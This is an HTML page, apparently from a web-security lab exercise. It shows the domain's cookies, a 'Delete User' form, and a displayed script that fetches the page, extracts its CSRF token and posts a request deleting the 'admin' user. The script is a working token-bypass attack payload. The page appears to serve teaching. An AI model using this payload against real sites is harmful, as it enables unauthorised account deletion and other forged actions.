<div class="container">
    <br><br>
    <div class="row">
        <div class="col-md-7">
            <p>Cookie of this domain (<span class="inline-code">document.cookie</span>):</p>
            <pre><code id="placeholder"></code></pre>
        </div>
    </div>
    <br><br>
    <div class="row">
        <div class="col-md-6">
            <form action="http://sc.io/chapter7?code=52" method="post" name="del-user">
                <div class="form-group">
                    <label for="username">Username</label>
                    <input type="text" name="username" id="username" class="form-control">
                </div>
                <div class="form-group">
                    <button type="submit" class="btn btn-danger">Delete User</button>
                </div>
            </form>
        </div>
    </div>
    <div class="row">
        <div class="col-md-7">
            <h2 class="alert">Does it work?</h2>
            <pre><code id="csrf">
&lt;script&gt;
    // request the page containing XRF token
    const level1 = new XMLHttpRequest();
    level1.open('GET', 'http://sc.io/chapter7?code=52');
    level1.addEventListener('load', e => {
        let content = level1.responseText;
        let match = /name\s*="csrf-token"\s*value\s*="([^"]+)"/.exec(content);
        if (!match) return;
        console.log(`Obtained XRF token: "${match[1]}"`);
        const form = new FormData();
        form.append('username', 'admin');
        form.append('csrf-token', match[1]);
        const level2 = new XMLHttpRequest();
        level2.open('POST', 'http://sc.io/chapter7?code=52', true);
        level2.addEventListener('load', e => {
            console.log(level2.responseText);
        });
        level2.send(form);
    });
    level1.send();
&lt;/script&gt;
            </code></pre>
        </div>
    </div>
    <br><br>
</div>
<script>
    hljs.initHighlightingOnLoad();
    document.getElementById('placeholder').textContent = document.cookie.split(/;\s*/).join('\n');
</script>
